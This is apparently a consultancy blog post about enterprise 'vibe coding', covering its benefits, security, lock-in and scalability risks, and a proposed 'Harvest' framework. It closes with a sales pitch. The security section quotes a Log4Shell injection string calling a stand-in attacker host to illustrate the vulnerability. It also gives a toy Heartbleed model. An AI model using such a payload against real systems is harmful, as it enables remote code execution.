The Candy Problem: What to Do When Your Teams Are Already Vibe Coding

Your teams are already using tools such as Claude Code, Cursor and Bolt. This isn't a problem to stamp out; in fact, it's a signal of unmet needs and untapped innovation.
Let's face it: if you keep the kids away from the candy, they're going to go and find it anyway. The thing is, though, that unlike calorific chocolate bars or tooth-breaking gobstoppers, what developers produce for an enterprise with unsanctioned toys can be catastrophic, or it can be something rather wonderful.
Output is now incredibly cheap. With the right introductory training and skilling up, most people can now build applications that would once have taken a full team many months and plenty of boring stakeholder meetings to produce. But what do we actually gain from this rapid development? Are these bundled-together pieces of code robust enough to pass the scrutiny of legal review, or are they just throwaway prototypes? The truth is probably somewhere in the middle.
The Hidden Value in "Shadow" Experiments
The sheer look of joy on a designer's face when they build a working application from scratch, by themselves, with the aid of vibe coding tools is, at least for me, delightful. One should never gatekeep such experiences; it's honestly why engineering is rather addictive. The feeling of compiling your code and seeing the pixels light up in the right order at the right time is truly one of life's delights.
Previously, this experience was locked behind bureaucracy and multiple layers of getting things done. Now, of course, it's behind a chat box, and employees from the humble associate to the CEO can become creators.
This should be encouraged, but in a safe space: without customer or patient data, and in areas that are not business critical. Employees are finding friction points, manifesting ideas into reality and creating real solutions.
The Legitimate Concerns
What Have We Even Made?
If a program has been created from a one-shot prompt and contains hundreds if not thousands of lines of code, does anyone truly know how it works? Given that context windows are still limited, a complex application vibecoded with Claude Code or another agentic coding tool likely won't fit into the model's context in full, so even the LLM won't know how everything works. And that's OK; most engineers and humans working on a solution won't be able to recite from memory how everything works either.
Where this changes, though, is with experienced human teams that have built frameworks together and suffered those 4am calls: they can collectively pool their knowledge to solve a problem. An old-school mixture of experts, if you like.
Security
Code is tested in battle, and oftentimes that battle has already happened: the software has introduced mitigations to make sure the same events don't recur.
Let's take the famous Heartbleed vulnerability. This was a bug within OpenSSL, a library that underpins a huge chunk of the encrypted web. A missing bounds check in a "heartbeat" feature meant that an attacker could ask a server to hand over chunks of its memory, which could include private keys and passwords. When it was found, though, experienced devs, confident in software they may not have written themselves but whose curation and creation they had first-hand experience of, released an elegant fix.
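To make that class of bug concrete, here is a toy Python model of the flawed logic. This is not OpenSSL's actual C code, and the "memory" and secrets are invented for illustration; it only shows what a missing bounds check on a client-supplied length looks like, and what the fix amounts to.

```python
# Toy model of the Heartbleed bug. The real flaw was in OpenSSL's C code;
# this sketch only illustrates the missing bounds check on a length field.

# Pretend this is the server's process memory: the heartbeat payload sits
# right next to secrets that were never meant to leave the machine.
MEMORY = b"PING" + b"SECRET_PRIVATE_KEY... user:admin pass:hunter2"

def heartbeat_vulnerable(claimed_length: int) -> bytes:
    # Bug: echo back `claimed_length` bytes without checking that the
    # actual payload ("PING") is really that long, so adjacent memory
    # leaks out to the attacker.
    return MEMORY[:claimed_length]

def heartbeat_fixed(claimed_length: int) -> bytes:
    payload = b"PING"
    # The fix: refuse requests that claim more data than the payload
    # actually contains.
    if claimed_length > len(payload):
        raise ValueError("heartbeat length exceeds payload size")
    return payload[:claimed_length]

print(heartbeat_vulnerable(40))  # leaks the adjacent "secrets"
print(heartbeat_fixed(4))        # b'PING'
```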
Then let's take Log4Shell, a vulnerability in the Java logging library Log4j. It allowed attackers to execute arbitrary code via a crafted string, along the lines of `${jndi:ldap://attacker.example/a}`, finding its way into a log message. Again, this was patched quickly by humans who knew how the library worked, and fixes were rolled out.
The question here, though, is this: if we treat our code like a black box and we are all prompt engineers, how can we stake our lives on a fix even being possible, let alone valid?
Vendor Lock-In
This is an obvious one. It has been the case with a lot of CMS tools in the past, and it's one of the reasons why Drupal was so attractive to enterprise customers. If you're writing something with Bolt.new or Lovable, you can take the code away and continue working on it. Other tools such as Bubble, Adalo and Softr, however, do not let you take the source code bundle elsewhere (as of the time of writing).
n8n, for example, is a wonderful tool, but good luck taking a workflow away and turning it into something you can run without n8n in the background. I'll return to n8n later when I discuss scalability.
This is why you must consider whether you can liberate the code from the tool afterwards and hand it over to industry-standard tooling, either to take it the last mile or to rewrite it on an approved platform.
Scalability
A single, simple prompt used to create a tool is unlikely to cover all of the edge cases. In fact, our testing has shown that even an in-depth prompt can suffer from drift, and the model may not complete all of the tasks. In some cases, personally, I have found that it silently forgets requirements buried deep in very long prompts; they're memory-holed.
These requirements often relate to scalability, a factor that consistently has to be taken into account. A less experienced new vibecoder may well say they want a feature on their freshly made personal blog to measure analytics and see how popular their articles are. An experienced developer or architect would naturally draw on their domain and company experience and pick an established platform to interface with. A mid-level developer may well wire up something asynchronous to ping the backend and increment a counter, as sketched below. An LLM might do it all server side, causing caching issues and all sorts of tomfoolery.
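As a hedged sketch of that difference, here are the two approaches side by side in a hypothetical Flask blog (the routes and names are invented for illustration; a real app would pick one approach and a real datastore):

```python
# Hypothetical sketch: two ways to count article views, side by side.
from collections import Counter
from flask import Flask

app = Flask(__name__)
views = Counter()  # in-memory for illustration only

@app.route("/articles/<slug>")
def article(slug):
    # The naive server-side approach: incrementing inside the render path
    # looks fine in development, but once a CDN or reverse proxy caches
    # this response the handler never runs again and the count silently
    # freezes.
    views[slug] += 1
    return f"<h1>{slug}</h1>"

@app.route("/hit/<slug>", methods=["POST"])
def hit(slug):
    # The asynchronous approach: a separate endpoint the browser pings
    # (e.g. via fetch or navigator.sendBeacon), so the page itself stays
    # cacheable while counts keep flowing.
    views[slug] += 1
    return "", 204
```

Counting in the render path works on day one and quietly breaks the moment a cache sits in front of it, which is precisely the kind of failure you only anticipate once you've been burned by it.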
This isn't about looking down on the junior developer or the LLM; it's that the wrinkles and bags under our eyes have these stories etched into them, from slow-loading sites to stakeholders grilling us about churn and poor performance. These memories have more impact on us than 100k tokens of context has on an LLM.
¿Dónde está nuestro error sin solución? ("Where is our mistake with no solution?") - Alaska y Dinarama, 1984
The problems here shouldn't be solved by a bigger and better LLM. Instead, they should motivate us to harvest these innovative solutions, ideas and patterns and mould them into frameworks that are battle-tested and, most importantly, have iron-clad contracts and assurances behind them that make them suitable to hold confidential patient and customer information.
That's not to say we shouldn't be using AI-accelerated coding platforms. In fact, we're advocating the opposite, but their use should be gradual and moderated. Even if we don't write every line of code, we must understand every line and how it fits into the greater architecture of the tool. Knowledge must live in neurons, not locked into tokens of context, because when that 4am call comes and the blood drains from your face, your heart skipping a beat because there's a security issue, there's one scenario that's worse: the one where you don't know how to fix it.
The Harvest Framework
I'm suggesting a draft framework for harvesting these ideas, which consists of the following steps:
- Identify the problem and roughly sketch it out. Roughly is key here! Don't solutionise or let your existing biases come into effect. We need to harvest that untapped experience across the entire organisation!
- Enable every individual who is interested in the problem to provide a solution at whatever level they feel comfortable with.
- Evaluate the general premise and document it using industry-standard documentation principles (ADRs, flow-chart diagrams, that sort of goodness).
- Integrate the solution in a way that follows your capability and business views. This could mean using alternative tools such as Copilot Studio instead of n8n, or Python instead of Rust (or vice versa).
- Use AI to help you craft all of this, but AI must never have the final say on what goes live.
If an organisation can do this, then it no longer has a development team of a few; everyone can, in their own way, truly combine their efforts to reinforce the company's outcomes.
In Practice: An LLM Gateway
I'll share a real example from my own experience. I built a Rust-based LLM gateway that provided analytics, usage metrics, and allowed users across an organisation to access multiple LLM tools including the company's internal models via an OpenAI-compatible API.
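To illustrate what "OpenAI-compatible" buys you, here's a hedged sketch of how a client might talk to such a gateway. The URL, token and model name below are invented placeholders, not the real deployment; the point is that the standard client library works unchanged once pointed at the gateway.

```python
# Hypothetical usage sketch: the gateway speaks the OpenAI wire format,
# so the standard client works once its base URL points at the gateway.
from openai import OpenAI

client = OpenAI(
    base_url="https://llm-gateway.internal.example/v1",  # placeholder URL
    api_key="internal-gateway-token",  # placeholder: issued by the gateway
)

response = client.chat.completions.create(
    model="internal-model-v1",  # placeholder: an internal model the gateway routes to
    messages=[{"role": "user", "content": "Summarise last week's usage metrics."}],
)
print(response.choices[0].message.content)
```

Because the gateway sits on that one standard interface, swapping the model behind it, or rewriting the gateway itself in another language, doesn't break a single client.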
The tool saw modest adoption and proved the concept worked. Then something happened that, in the old world, would have felt like a waste: a larger team took it over and rewrote the entire thing in Python, because that's their preferred language and what they can support long-term.
Previously, this would have stung: months of work, rewritten from scratch. But here's the thing: because output is now cheap, that initial Rust implementation wasn't months of work. It was days. The value wasn't in the code itself but in the validated idea, the proven architecture, and the documented requirements that emerged from actually building it.
The Python team didn't start from a requirements document written by someone who'd never built it. They started from a working system they could run, test, and understand. That's the harvest in action.
How Drutek Can Help
Drutek has experience embedding within enterprise-level teams and can help train your developers and non-technical people to become experts with modern application development tools such as Cursor, Claude Code, Copilot Studio, Bolt.new and Lovable.
More importantly, we can help you build the frameworks and processes to harvest the innovation already happening across your organisation: capturing the ideas, documenting the patterns, and translating them into production-ready solutions on approved platforms.
We seek to empower the previously unempowered and make a world where the gatekeepers are vanquished and all can create.
Interested in running a Harvest workshop with your team? Get in touch.
